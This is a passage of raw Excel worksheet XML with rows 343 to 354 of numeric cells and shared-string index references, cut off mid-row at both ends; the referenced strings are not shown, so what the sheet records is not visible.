      <c r="BA343" t="s">
        <v>16948</v>
      </c>
      <c r="BB343" t="s">
        <v>15403</v>
      </c>
      <c r="BC343" t="s">
        <v>10409</v>
      </c>
      <c r="BD343" t="s">
        <v>9481</v>
      </c>
    </row>
    <row r="344" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A344">
        <v>1430</v>
      </c>
      <c r="B344" t="s">
        <v>2867</v>
      </c>
      <c r="C344" t="s">
        <v>168</v>
      </c>
      <c r="D344" t="s">
        <v>2868</v>
      </c>
      <c r="E344" t="s">
        <v>2869</v>
      </c>
      <c r="F344" t="s">
        <v>2870</v>
      </c>
      <c r="G344" s="1">
        <v>44103</v>
      </c>
      <c r="H344">
        <v>2144</v>
      </c>
      <c r="I344">
        <v>2144</v>
      </c>
      <c r="J344">
        <v>1</v>
      </c>
      <c r="K344">
        <v>1</v>
      </c>
      <c r="L344">
        <v>0</v>
      </c>
      <c r="M344">
        <v>0</v>
      </c>
      <c r="N344">
        <v>0</v>
      </c>
      <c r="O344">
        <v>0</v>
      </c>
      <c r="P344">
        <v>0</v>
      </c>
      <c r="Q344">
        <v>0</v>
      </c>
      <c r="R344">
        <v>0</v>
      </c>
      <c r="S344">
        <v>1</v>
      </c>
      <c r="T344">
        <v>0</v>
      </c>
      <c r="U344">
        <v>500000</v>
      </c>
      <c r="V344">
        <v>500000</v>
      </c>
      <c r="W344">
        <v>0</v>
      </c>
      <c r="X344">
        <v>0</v>
      </c>
      <c r="Y344">
        <v>0</v>
      </c>
      <c r="Z344">
        <v>0</v>
      </c>
      <c r="AA344">
        <v>0</v>
      </c>
      <c r="AB344">
        <v>0</v>
      </c>
      <c r="AC344">
        <v>0</v>
      </c>
      <c r="AD344">
        <v>1</v>
      </c>
      <c r="AE344">
        <v>0</v>
      </c>
      <c r="AF344" t="s">
        <v>2871</v>
      </c>
      <c r="AG344">
        <v>17530</v>
      </c>
      <c r="AH344">
        <v>13</v>
      </c>
      <c r="AJ344">
        <v>176</v>
      </c>
      <c r="AK344" t="s">
        <v>2872</v>
      </c>
      <c r="AL344" t="s">
        <v>2873</v>
      </c>
      <c r="AM344" t="s">
        <v>2874</v>
      </c>
      <c r="AN344" t="s">
        <v>55</v>
      </c>
      <c r="AO344">
        <v>1973</v>
      </c>
      <c r="AP344" t="s">
        <v>2875</v>
      </c>
      <c r="AQ344" t="s">
        <v>2876</v>
      </c>
      <c r="AR344" t="s">
        <v>2877</v>
      </c>
      <c r="AS344" t="s">
        <v>179</v>
      </c>
      <c r="AT344" t="s">
        <v>58</v>
      </c>
      <c r="AU344">
        <v>24</v>
      </c>
      <c r="AV344">
        <v>24</v>
      </c>
      <c r="AW344">
        <v>140</v>
      </c>
      <c r="AX344">
        <v>0</v>
      </c>
      <c r="AY344">
        <v>285</v>
      </c>
      <c r="AZ344">
        <v>1</v>
      </c>
      <c r="BA344" t="s">
        <v>16886</v>
      </c>
      <c r="BB344" t="s">
        <v>15271</v>
      </c>
      <c r="BC344" t="s">
        <v>11966</v>
      </c>
      <c r="BD344">
        <v>0</v>
      </c>
    </row>
    <row r="345" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A345">
        <v>1713</v>
      </c>
      <c r="B345" t="s">
        <v>2878</v>
      </c>
      <c r="C345" t="s">
        <v>157</v>
      </c>
      <c r="D345" t="s">
        <v>2879</v>
      </c>
      <c r="E345" t="s">
        <v>142</v>
      </c>
      <c r="F345" t="s">
        <v>2880</v>
      </c>
      <c r="G345" s="1">
        <v>44081</v>
      </c>
      <c r="H345">
        <v>2192</v>
      </c>
      <c r="I345">
        <v>2192</v>
      </c>
      <c r="J345">
        <v>1</v>
      </c>
      <c r="K345">
        <v>0</v>
      </c>
      <c r="L345">
        <v>0</v>
      </c>
      <c r="M345">
        <v>0</v>
      </c>
      <c r="N345">
        <v>0</v>
      </c>
      <c r="O345">
        <v>0</v>
      </c>
      <c r="P345">
        <v>0</v>
      </c>
      <c r="Q345">
        <v>0</v>
      </c>
      <c r="R345">
        <v>0</v>
      </c>
      <c r="S345">
        <v>1</v>
      </c>
      <c r="T345">
        <v>0</v>
      </c>
      <c r="U345">
        <v>300000</v>
      </c>
      <c r="V345">
        <v>0</v>
      </c>
      <c r="W345">
        <v>0</v>
      </c>
      <c r="X345">
        <v>0</v>
      </c>
      <c r="Y345">
        <v>0</v>
      </c>
      <c r="Z345">
        <v>0</v>
      </c>
      <c r="AA345">
        <v>0</v>
      </c>
      <c r="AB345">
        <v>0</v>
      </c>
      <c r="AC345">
        <v>0</v>
      </c>
      <c r="AD345">
        <v>1</v>
      </c>
      <c r="AE345">
        <v>0</v>
      </c>
      <c r="AF345" t="s">
        <v>2881</v>
      </c>
      <c r="AG345">
        <v>60184</v>
      </c>
      <c r="AH345">
        <v>16</v>
      </c>
      <c r="AJ345">
        <v>264</v>
      </c>
      <c r="AK345" t="s">
        <v>211</v>
      </c>
      <c r="AL345" t="s">
        <v>2882</v>
      </c>
      <c r="AM345" t="s">
        <v>2883</v>
      </c>
      <c r="AN345" t="s">
        <v>55</v>
      </c>
      <c r="AO345">
        <v>2014</v>
      </c>
      <c r="AP345" t="s">
        <v>2884</v>
      </c>
      <c r="AQ345" t="s">
        <v>2885</v>
      </c>
      <c r="AR345" t="s">
        <v>2881</v>
      </c>
      <c r="AS345" t="s">
        <v>71</v>
      </c>
      <c r="AT345" t="s">
        <v>58</v>
      </c>
      <c r="AU345">
        <v>6</v>
      </c>
      <c r="AV345">
        <v>0</v>
      </c>
      <c r="AW345">
        <v>5</v>
      </c>
      <c r="AX345">
        <v>0</v>
      </c>
      <c r="AY345">
        <v>3</v>
      </c>
      <c r="AZ345">
        <v>4</v>
      </c>
      <c r="BA345" t="s">
        <v>16976</v>
      </c>
      <c r="BB345" t="s">
        <v>15468</v>
      </c>
      <c r="BC345" t="s">
        <v>11143</v>
      </c>
      <c r="BD345">
        <v>0</v>
      </c>
    </row>
    <row r="346" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A346">
        <v>935</v>
      </c>
      <c r="B346" t="s">
        <v>2886</v>
      </c>
      <c r="C346" t="s">
        <v>168</v>
      </c>
      <c r="D346" t="s">
        <v>2887</v>
      </c>
      <c r="E346" t="s">
        <v>1196</v>
      </c>
      <c r="F346" t="s">
        <v>2888</v>
      </c>
      <c r="G346" s="1">
        <v>44235</v>
      </c>
      <c r="H346">
        <v>2228</v>
      </c>
      <c r="I346">
        <v>2228</v>
      </c>
      <c r="J346">
        <v>0</v>
      </c>
      <c r="K346">
        <v>0</v>
      </c>
      <c r="L346">
        <v>0</v>
      </c>
      <c r="M346">
        <v>0</v>
      </c>
      <c r="N346">
        <v>0</v>
      </c>
      <c r="O346">
        <v>0</v>
      </c>
      <c r="P346">
        <v>0</v>
      </c>
      <c r="Q346">
        <v>0</v>
      </c>
      <c r="R346">
        <v>0</v>
      </c>
      <c r="S346">
        <v>0</v>
      </c>
      <c r="T346">
        <v>1</v>
      </c>
      <c r="U346">
        <v>0</v>
      </c>
      <c r="V346">
        <v>0</v>
      </c>
      <c r="W346">
        <v>0</v>
      </c>
      <c r="X346">
        <v>0</v>
      </c>
      <c r="Y346">
        <v>0</v>
      </c>
      <c r="Z346">
        <v>0</v>
      </c>
      <c r="AA346">
        <v>0</v>
      </c>
      <c r="AB346">
        <v>0</v>
      </c>
      <c r="AC346">
        <v>0</v>
      </c>
      <c r="AD346">
        <v>0</v>
      </c>
      <c r="AE346">
        <v>800000</v>
      </c>
      <c r="AF346" t="s">
        <v>2889</v>
      </c>
      <c r="AG346">
        <v>17530</v>
      </c>
      <c r="AH346">
        <v>13</v>
      </c>
      <c r="AJ346">
        <v>176</v>
      </c>
      <c r="AK346" t="s">
        <v>2872</v>
      </c>
      <c r="AL346" t="s">
        <v>2890</v>
      </c>
      <c r="AM346" t="s">
        <v>2891</v>
      </c>
      <c r="AN346" t="s">
        <v>82</v>
      </c>
      <c r="AO346">
        <v>2005</v>
      </c>
      <c r="AP346" t="s">
        <v>2892</v>
      </c>
      <c r="AQ346" t="s">
        <v>2893</v>
      </c>
      <c r="AR346" t="s">
        <v>2894</v>
      </c>
      <c r="AS346" t="s">
        <v>553</v>
      </c>
      <c r="AT346" t="s">
        <v>86</v>
      </c>
      <c r="AU346">
        <v>0</v>
      </c>
      <c r="AV346">
        <v>0</v>
      </c>
      <c r="AW346">
        <v>12</v>
      </c>
      <c r="AX346">
        <v>0</v>
      </c>
      <c r="AY346">
        <v>101</v>
      </c>
      <c r="AZ346">
        <v>68</v>
      </c>
      <c r="BA346" t="s">
        <v>16778</v>
      </c>
      <c r="BB346" t="s">
        <v>14946</v>
      </c>
      <c r="BC346" t="s">
        <v>10845</v>
      </c>
      <c r="BD346">
        <v>0</v>
      </c>
    </row>
    <row r="347" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A347">
        <v>1057</v>
      </c>
      <c r="B347" t="s">
        <v>2895</v>
      </c>
      <c r="C347" t="s">
        <v>129</v>
      </c>
      <c r="D347" t="s">
        <v>2896</v>
      </c>
      <c r="E347" t="s">
        <v>142</v>
      </c>
      <c r="F347" t="s">
        <v>2897</v>
      </c>
      <c r="G347" s="1">
        <v>44061</v>
      </c>
      <c r="H347">
        <v>2392</v>
      </c>
      <c r="I347">
        <v>2392</v>
      </c>
      <c r="J347">
        <v>3</v>
      </c>
      <c r="K347">
        <v>0</v>
      </c>
      <c r="L347">
        <v>3</v>
      </c>
      <c r="M347">
        <v>2</v>
      </c>
      <c r="N347">
        <v>400</v>
      </c>
      <c r="O347">
        <v>0</v>
      </c>
      <c r="P347">
        <v>0</v>
      </c>
      <c r="Q347">
        <v>35</v>
      </c>
      <c r="R347">
        <v>50</v>
      </c>
      <c r="S347">
        <v>0</v>
      </c>
      <c r="T347">
        <v>1</v>
      </c>
      <c r="U347">
        <v>600000</v>
      </c>
      <c r="V347">
        <v>0</v>
      </c>
      <c r="W347">
        <v>3000</v>
      </c>
      <c r="X347">
        <v>700</v>
      </c>
      <c r="Y347">
        <v>0</v>
      </c>
      <c r="Z347">
        <v>0</v>
      </c>
      <c r="AA347">
        <v>0</v>
      </c>
      <c r="AB347">
        <v>0</v>
      </c>
      <c r="AC347">
        <v>0</v>
      </c>
      <c r="AD347">
        <v>0</v>
      </c>
      <c r="AE347">
        <v>0</v>
      </c>
      <c r="AF347" t="s">
        <v>2898</v>
      </c>
      <c r="AG347">
        <v>15134</v>
      </c>
      <c r="AH347">
        <v>11</v>
      </c>
      <c r="AJ347">
        <v>270</v>
      </c>
      <c r="AK347" t="s">
        <v>2899</v>
      </c>
      <c r="AL347" t="s">
        <v>2900</v>
      </c>
      <c r="AM347" t="s">
        <v>2901</v>
      </c>
      <c r="AN347" t="s">
        <v>82</v>
      </c>
      <c r="AO347">
        <v>2016</v>
      </c>
      <c r="AP347">
        <v>215901538</v>
      </c>
      <c r="AQ347" t="s">
        <v>2902</v>
      </c>
      <c r="AR347" t="s">
        <v>2903</v>
      </c>
      <c r="AU347">
        <v>26</v>
      </c>
      <c r="AV347">
        <v>1</v>
      </c>
      <c r="AW347">
        <v>20</v>
      </c>
      <c r="AX347">
        <v>460</v>
      </c>
      <c r="AY347">
        <v>27</v>
      </c>
      <c r="AZ347">
        <v>47</v>
      </c>
      <c r="BA347" t="s">
        <v>16797</v>
      </c>
      <c r="BB347" t="s">
        <v>14994</v>
      </c>
      <c r="BC347">
        <v>0</v>
      </c>
      <c r="BD347" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="348" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A348">
        <v>873</v>
      </c>
      <c r="B348" t="s">
        <v>2904</v>
      </c>
      <c r="C348" t="s">
        <v>168</v>
      </c>
      <c r="D348" t="s">
        <v>2905</v>
      </c>
      <c r="E348" t="s">
        <v>2906</v>
      </c>
      <c r="F348" t="s">
        <v>2907</v>
      </c>
      <c r="G348" s="1">
        <v>44081</v>
      </c>
      <c r="H348">
        <v>2437</v>
      </c>
      <c r="I348">
        <v>2437</v>
      </c>
      <c r="J348">
        <v>0</v>
      </c>
      <c r="K348">
        <v>1</v>
      </c>
      <c r="L348">
        <v>0</v>
      </c>
      <c r="M348">
        <v>0</v>
      </c>
      <c r="N348">
        <v>0</v>
      </c>
      <c r="O348">
        <v>3</v>
      </c>
      <c r="P348">
        <v>0</v>
      </c>
      <c r="Q348">
        <v>0</v>
      </c>
      <c r="R348">
        <v>0</v>
      </c>
      <c r="S348">
        <v>0</v>
      </c>
      <c r="T348">
        <v>1</v>
      </c>
      <c r="U348">
        <v>0</v>
      </c>
      <c r="V348">
        <v>1000</v>
      </c>
      <c r="W348">
        <v>0</v>
      </c>
      <c r="X348">
        <v>0</v>
      </c>
      <c r="Y348">
        <v>0</v>
      </c>
      <c r="Z348">
        <v>1000</v>
      </c>
      <c r="AA348">
        <v>0</v>
      </c>
      <c r="AB348">
        <v>0</v>
      </c>
      <c r="AC348">
        <v>0</v>
      </c>
      <c r="AD348">
        <v>0</v>
      </c>
      <c r="AE348">
        <v>10000</v>
      </c>
      <c r="AF348" t="s">
        <v>2908</v>
      </c>
      <c r="AG348">
        <v>16340</v>
      </c>
      <c r="AH348">
        <v>13</v>
      </c>
      <c r="AJ348">
        <v>161</v>
      </c>
      <c r="AK348" t="s">
        <v>2909</v>
      </c>
      <c r="AL348" t="s">
        <v>2910</v>
      </c>
      <c r="AM348" t="s">
        <v>2911</v>
      </c>
      <c r="AN348" t="s">
        <v>68</v>
      </c>
      <c r="AO348">
        <v>2015</v>
      </c>
      <c r="AP348">
        <v>2518618620</v>
      </c>
      <c r="AQ348" t="s">
        <v>2912</v>
      </c>
      <c r="AR348" t="s">
        <v>2913</v>
      </c>
      <c r="AS348" t="s">
        <v>71</v>
      </c>
      <c r="AT348" t="s">
        <v>72</v>
      </c>
      <c r="AU348">
        <v>6</v>
      </c>
      <c r="AV348">
        <v>1</v>
      </c>
      <c r="AW348">
        <v>11</v>
      </c>
      <c r="AX348">
        <v>18</v>
      </c>
      <c r="AY348">
        <v>26</v>
      </c>
      <c r="AZ348">
        <v>5</v>
      </c>
      <c r="BA348" t="s">
        <v>17290</v>
      </c>
      <c r="BB348" t="s">
        <v>14907</v>
      </c>
      <c r="BC348">
        <v>0</v>
      </c>
      <c r="BD348" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="349" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A349">
        <v>1275</v>
      </c>
      <c r="B349" t="s">
        <v>2914</v>
      </c>
      <c r="C349" t="s">
        <v>318</v>
      </c>
      <c r="D349" t="s">
        <v>2915</v>
      </c>
      <c r="E349" t="s">
        <v>111</v>
      </c>
      <c r="F349" t="s">
        <v>2916</v>
      </c>
      <c r="G349" s="1">
        <v>43914</v>
      </c>
      <c r="H349">
        <v>2483</v>
      </c>
      <c r="I349">
        <v>2483</v>
      </c>
      <c r="J349">
        <v>1</v>
      </c>
      <c r="K349">
        <v>0</v>
      </c>
      <c r="L349">
        <v>2</v>
      </c>
      <c r="M349">
        <v>0</v>
      </c>
      <c r="N349">
        <v>0</v>
      </c>
      <c r="O349">
        <v>0</v>
      </c>
      <c r="P349">
        <v>0</v>
      </c>
      <c r="Q349">
        <v>0</v>
      </c>
      <c r="R349">
        <v>4</v>
      </c>
      <c r="S349">
        <v>0</v>
      </c>
      <c r="T349">
        <v>0</v>
      </c>
      <c r="U349">
        <v>2000</v>
      </c>
      <c r="V349">
        <v>0</v>
      </c>
      <c r="W349">
        <v>8000</v>
      </c>
      <c r="X349">
        <v>0</v>
      </c>
      <c r="Y349">
        <v>0</v>
      </c>
      <c r="Z349">
        <v>0</v>
      </c>
      <c r="AA349">
        <v>0</v>
      </c>
      <c r="AB349">
        <v>0</v>
      </c>
      <c r="AC349">
        <v>4000</v>
      </c>
      <c r="AD349">
        <v>0</v>
      </c>
      <c r="AE349">
        <v>0</v>
      </c>
      <c r="AF349" t="s">
        <v>2917</v>
      </c>
      <c r="AG349">
        <v>90551</v>
      </c>
      <c r="AH349">
        <v>26</v>
      </c>
      <c r="AJ349">
        <v>406</v>
      </c>
      <c r="AK349" t="s">
        <v>647</v>
      </c>
      <c r="AL349" t="s">
        <v>2918</v>
      </c>
      <c r="AM349" t="s">
        <v>2919</v>
      </c>
      <c r="AN349" t="s">
        <v>55</v>
      </c>
      <c r="AO349">
        <v>2018</v>
      </c>
      <c r="AP349">
        <v>811442028</v>
      </c>
      <c r="AQ349" t="s">
        <v>2920</v>
      </c>
      <c r="AR349" t="s">
        <v>2921</v>
      </c>
      <c r="AS349" t="s">
        <v>71</v>
      </c>
      <c r="AT349" t="s">
        <v>58</v>
      </c>
      <c r="AU349">
        <v>6</v>
      </c>
      <c r="AV349">
        <v>0</v>
      </c>
      <c r="AW349">
        <v>28</v>
      </c>
      <c r="AX349">
        <v>42</v>
      </c>
      <c r="AY349">
        <v>10</v>
      </c>
      <c r="AZ349">
        <v>6</v>
      </c>
      <c r="BA349" t="s">
        <v>16836</v>
      </c>
      <c r="BB349" t="s">
        <v>15168</v>
      </c>
      <c r="BC349">
        <v>0</v>
      </c>
      <c r="BD349" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="350" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A350">
        <v>1407</v>
      </c>
      <c r="B350" t="s">
        <v>2922</v>
      </c>
      <c r="C350" t="s">
        <v>129</v>
      </c>
      <c r="D350" t="s">
        <v>2923</v>
      </c>
      <c r="E350" t="s">
        <v>843</v>
      </c>
      <c r="F350" t="s">
        <v>2924</v>
      </c>
      <c r="G350" s="1">
        <v>43935</v>
      </c>
      <c r="H350">
        <v>2570</v>
      </c>
      <c r="I350">
        <v>2570</v>
      </c>
      <c r="J350">
        <v>2</v>
      </c>
      <c r="K350">
        <v>2</v>
      </c>
      <c r="L350">
        <v>0</v>
      </c>
      <c r="M350">
        <v>0</v>
      </c>
      <c r="N350">
        <v>0</v>
      </c>
      <c r="O350">
        <v>0</v>
      </c>
      <c r="P350">
        <v>0</v>
      </c>
      <c r="Q350">
        <v>0</v>
      </c>
      <c r="R350">
        <v>3</v>
      </c>
      <c r="S350">
        <v>0</v>
      </c>
      <c r="T350">
        <v>0</v>
      </c>
      <c r="U350">
        <v>72000</v>
      </c>
      <c r="V350">
        <v>72000</v>
      </c>
      <c r="W350">
        <v>0</v>
      </c>
      <c r="X350">
        <v>0</v>
      </c>
      <c r="Y350">
        <v>0</v>
      </c>
      <c r="Z350">
        <v>0</v>
      </c>
      <c r="AA350">
        <v>0</v>
      </c>
      <c r="AB350">
        <v>500</v>
      </c>
      <c r="AC350">
        <v>60</v>
      </c>
      <c r="AD350">
        <v>0</v>
      </c>
      <c r="AE350">
        <v>0</v>
      </c>
      <c r="AF350" t="s">
        <v>2925</v>
      </c>
      <c r="AG350">
        <v>15314</v>
      </c>
      <c r="AH350">
        <v>11</v>
      </c>
      <c r="AJ350">
        <v>268</v>
      </c>
      <c r="AK350" t="s">
        <v>829</v>
      </c>
      <c r="AL350" t="s">
        <v>2900</v>
      </c>
      <c r="AM350" t="s">
        <v>2926</v>
      </c>
      <c r="AN350" t="s">
        <v>55</v>
      </c>
      <c r="AO350">
        <v>2003</v>
      </c>
      <c r="AP350">
        <v>2172801143</v>
      </c>
      <c r="AQ350" t="s">
        <v>2927</v>
      </c>
      <c r="AR350" t="s">
        <v>2928</v>
      </c>
      <c r="AS350" t="s">
        <v>71</v>
      </c>
      <c r="AT350" t="s">
        <v>58</v>
      </c>
      <c r="AU350">
        <v>26</v>
      </c>
      <c r="AV350">
        <v>2</v>
      </c>
      <c r="AW350">
        <v>0</v>
      </c>
      <c r="AX350">
        <v>0</v>
      </c>
      <c r="AY350">
        <v>41</v>
      </c>
      <c r="AZ350">
        <v>7</v>
      </c>
      <c r="BA350" t="s">
        <v>16878</v>
      </c>
      <c r="BB350" t="s">
        <v>15256</v>
      </c>
      <c r="BC350" t="s">
        <v>10031</v>
      </c>
      <c r="BD350">
        <v>0</v>
      </c>
    </row>
    <row r="351" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A351">
        <v>922</v>
      </c>
      <c r="B351" t="s">
        <v>2929</v>
      </c>
      <c r="C351" t="s">
        <v>47</v>
      </c>
      <c r="D351" t="s">
        <v>2930</v>
      </c>
      <c r="E351" t="s">
        <v>2931</v>
      </c>
      <c r="F351" t="s">
        <v>2932</v>
      </c>
      <c r="G351" s="1">
        <v>44323</v>
      </c>
      <c r="H351">
        <v>2590</v>
      </c>
      <c r="I351">
        <v>2590</v>
      </c>
      <c r="J351">
        <v>2</v>
      </c>
      <c r="K351">
        <v>1</v>
      </c>
      <c r="L351">
        <v>1</v>
      </c>
      <c r="M351">
        <v>4</v>
      </c>
      <c r="N351">
        <v>2000</v>
      </c>
      <c r="O351">
        <v>0</v>
      </c>
      <c r="P351">
        <v>0</v>
      </c>
      <c r="Q351">
        <v>10</v>
      </c>
      <c r="R351">
        <v>4</v>
      </c>
      <c r="S351">
        <v>0</v>
      </c>
      <c r="T351">
        <v>0</v>
      </c>
      <c r="U351">
        <v>750000</v>
      </c>
      <c r="V351">
        <v>4000</v>
      </c>
      <c r="W351">
        <v>4000</v>
      </c>
      <c r="X351">
        <v>6000</v>
      </c>
      <c r="Y351">
        <v>0</v>
      </c>
      <c r="Z351">
        <v>0</v>
      </c>
      <c r="AA351">
        <v>0</v>
      </c>
      <c r="AB351">
        <v>500</v>
      </c>
      <c r="AC351">
        <v>5000</v>
      </c>
      <c r="AD351">
        <v>0</v>
      </c>
      <c r="AE351">
        <v>0</v>
      </c>
      <c r="AF351" t="s">
        <v>2933</v>
      </c>
      <c r="AG351">
        <v>20242</v>
      </c>
      <c r="AH351">
        <v>2</v>
      </c>
      <c r="AJ351">
        <v>53</v>
      </c>
      <c r="AK351" t="s">
        <v>1582</v>
      </c>
      <c r="AL351" t="s">
        <v>1583</v>
      </c>
      <c r="AM351" t="s">
        <v>2934</v>
      </c>
      <c r="AN351" t="s">
        <v>55</v>
      </c>
      <c r="AO351">
        <v>2017</v>
      </c>
      <c r="AP351">
        <v>616857332</v>
      </c>
      <c r="AQ351" t="s">
        <v>2935</v>
      </c>
      <c r="AR351" t="s">
        <v>2936</v>
      </c>
      <c r="AS351" t="s">
        <v>71</v>
      </c>
      <c r="AT351" t="s">
        <v>58</v>
      </c>
      <c r="AU351">
        <v>26</v>
      </c>
      <c r="AV351">
        <v>1</v>
      </c>
      <c r="AW351">
        <v>15</v>
      </c>
      <c r="AX351">
        <v>35</v>
      </c>
      <c r="AY351">
        <v>35</v>
      </c>
      <c r="AZ351">
        <v>95</v>
      </c>
      <c r="BA351" t="s">
        <v>16759</v>
      </c>
      <c r="BB351" t="s">
        <v>14861</v>
      </c>
      <c r="BC351">
        <v>0</v>
      </c>
      <c r="BD351" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="352" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A352">
        <v>1507</v>
      </c>
      <c r="B352" t="s">
        <v>2937</v>
      </c>
      <c r="C352" t="s">
        <v>99</v>
      </c>
      <c r="D352" t="s">
        <v>2938</v>
      </c>
      <c r="E352" t="s">
        <v>300</v>
      </c>
      <c r="F352" t="s">
        <v>2939</v>
      </c>
      <c r="G352" s="1">
        <v>44153</v>
      </c>
      <c r="H352">
        <v>2633</v>
      </c>
      <c r="I352">
        <v>2633</v>
      </c>
      <c r="J352">
        <v>0</v>
      </c>
      <c r="K352">
        <v>4</v>
      </c>
      <c r="L352">
        <v>0</v>
      </c>
      <c r="M352">
        <v>0</v>
      </c>
      <c r="N352">
        <v>0</v>
      </c>
      <c r="O352">
        <v>0</v>
      </c>
      <c r="P352">
        <v>0</v>
      </c>
      <c r="Q352">
        <v>0</v>
      </c>
      <c r="R352">
        <v>0</v>
      </c>
      <c r="S352">
        <v>1</v>
      </c>
      <c r="T352">
        <v>0</v>
      </c>
      <c r="U352">
        <v>0</v>
      </c>
      <c r="V352">
        <v>600000</v>
      </c>
      <c r="W352">
        <v>0</v>
      </c>
      <c r="X352">
        <v>0</v>
      </c>
      <c r="Y352">
        <v>0</v>
      </c>
      <c r="Z352">
        <v>0</v>
      </c>
      <c r="AA352">
        <v>0</v>
      </c>
      <c r="AB352">
        <v>0</v>
      </c>
      <c r="AC352">
        <v>0</v>
      </c>
      <c r="AD352">
        <v>1</v>
      </c>
      <c r="AE352">
        <v>0</v>
      </c>
      <c r="AF352" t="s">
        <v>2871</v>
      </c>
      <c r="AG352">
        <v>14430</v>
      </c>
      <c r="AH352">
        <v>12</v>
      </c>
      <c r="AJ352">
        <v>160</v>
      </c>
      <c r="AK352" t="s">
        <v>987</v>
      </c>
      <c r="AL352" t="s">
        <v>988</v>
      </c>
      <c r="AM352" t="s">
        <v>2940</v>
      </c>
      <c r="AN352" t="s">
        <v>68</v>
      </c>
      <c r="AO352">
        <v>2001</v>
      </c>
      <c r="AP352" t="s">
        <v>2875</v>
      </c>
      <c r="AQ352" t="s">
        <v>2941</v>
      </c>
      <c r="AR352" t="s">
        <v>2942</v>
      </c>
      <c r="AS352" t="s">
        <v>71</v>
      </c>
      <c r="AT352" t="s">
        <v>72</v>
      </c>
      <c r="AU352">
        <v>24</v>
      </c>
      <c r="AV352">
        <v>24</v>
      </c>
      <c r="AW352">
        <v>0</v>
      </c>
      <c r="AX352">
        <v>0</v>
      </c>
      <c r="AY352">
        <v>7</v>
      </c>
      <c r="AZ352">
        <v>1</v>
      </c>
      <c r="BA352" t="s">
        <v>16917</v>
      </c>
      <c r="BB352" t="s">
        <v>15327</v>
      </c>
      <c r="BC352" t="s">
        <v>11966</v>
      </c>
      <c r="BD352">
        <v>0</v>
      </c>
    </row>
    <row r="353" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A353">
        <v>899</v>
      </c>
      <c r="B353" t="s">
        <v>2943</v>
      </c>
      <c r="C353" t="s">
        <v>318</v>
      </c>
      <c r="D353" t="s">
        <v>2944</v>
      </c>
      <c r="E353" t="s">
        <v>111</v>
      </c>
      <c r="F353" t="s">
        <v>2945</v>
      </c>
      <c r="G353" s="1">
        <v>44088</v>
      </c>
      <c r="H353">
        <v>2746</v>
      </c>
      <c r="I353">
        <v>2746</v>
      </c>
      <c r="J353">
        <v>2</v>
      </c>
      <c r="K353">
        <v>0</v>
      </c>
      <c r="L353">
        <v>2</v>
      </c>
      <c r="M353">
        <v>0</v>
      </c>
      <c r="N353">
        <v>0</v>
      </c>
      <c r="O353">
        <v>0</v>
      </c>
      <c r="P353">
        <v>0</v>
      </c>
      <c r="Q353">
        <v>0</v>
      </c>
      <c r="R353">
        <v>0</v>
      </c>
      <c r="S353">
        <v>0</v>
      </c>
      <c r="T353">
        <v>1</v>
      </c>
      <c r="U353">
        <v>200000</v>
      </c>
      <c r="V353">
        <v>0</v>
      </c>
      <c r="W353">
        <v>4000</v>
      </c>
      <c r="X353">
        <v>0</v>
      </c>
      <c r="Y353">
        <v>0</v>
      </c>
      <c r="Z353">
        <v>0</v>
      </c>
      <c r="AA353">
        <v>0</v>
      </c>
      <c r="AB353">
        <v>0</v>
      </c>
      <c r="AC353">
        <v>0</v>
      </c>
      <c r="AD353">
        <v>0</v>
      </c>
      <c r="AE353">
        <v>200000</v>
      </c>
      <c r="AF353" t="s">
        <v>2946</v>
      </c>
      <c r="AG353">
        <v>90243</v>
      </c>
      <c r="AH353">
        <v>26</v>
      </c>
      <c r="AJ353">
        <v>420</v>
      </c>
      <c r="AK353" t="s">
        <v>331</v>
      </c>
      <c r="AL353" t="s">
        <v>332</v>
      </c>
      <c r="AM353" t="s">
        <v>2947</v>
      </c>
      <c r="AN353" t="s">
        <v>55</v>
      </c>
      <c r="AO353">
        <v>2015</v>
      </c>
      <c r="AP353" t="s">
        <v>2948</v>
      </c>
      <c r="AQ353" t="s">
        <v>2949</v>
      </c>
      <c r="AR353" t="s">
        <v>2950</v>
      </c>
      <c r="AS353" t="s">
        <v>71</v>
      </c>
      <c r="AT353" t="s">
        <v>58</v>
      </c>
      <c r="AU353">
        <v>25</v>
      </c>
      <c r="AV353">
        <v>1</v>
      </c>
      <c r="AW353">
        <v>24</v>
      </c>
      <c r="AX353">
        <v>40</v>
      </c>
      <c r="AY353">
        <v>8</v>
      </c>
      <c r="AZ353">
        <v>13</v>
      </c>
      <c r="BA353" t="s">
        <v>16768</v>
      </c>
      <c r="BB353" t="s">
        <v>14910</v>
      </c>
      <c r="BC353" t="s">
        <v>9536</v>
      </c>
      <c r="BD353" t="s">
        <v>10645</v>
      </c>
    </row>
    <row r="354" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A354">
        <v>1248</v>
      </c>
      <c r="B354" t="s">
        <v>2951</v>
      </c>
      <c r="C354" t="s">
        <v>129</v>
      </c>
      <c r="D354" t="s">
        <v>2952</v>
      </c>
      <c r="E354" t="s">
        <v>1925</v>
      </c>
      <c r="F354" t="s">
        <v>2953</v>
      </c>
      <c r="G354" s="1">
        <v>44362</v>
      </c>
      <c r="H354">
        <v>2796</v>
      </c>
      <c r="I354">
        <v>2796</v>
      </c>
      <c r="J354">
        <v>0</v>
      </c>
      <c r="K354">
        <v>1</v>
      </c>
      <c r="L354">
        <v>0</v>
      </c>
      <c r="M354">
        <v>4</v>
      </c>
      <c r="N354">
        <v>0</v>
      </c>
      <c r="O354">
        <v>0</v>
      </c>
      <c r="P354">
        <v>0</v>
      </c>
      <c r="Q354">
        <v>70</v>
      </c>
      <c r="R354">
        <v>15</v>
      </c>
      <c r="S354">
        <v>0</v>
      </c>
      <c r="T354">
        <v>1</v>
      </c>
      <c r="U354">
        <v>0</v>
      </c>
      <c r="V354">
        <v>500</v>
      </c>
      <c r="W354">
        <v>0</v>
      </c>
      <c r="X354">
        <v>500</v>
      </c>
      <c r="Y354">
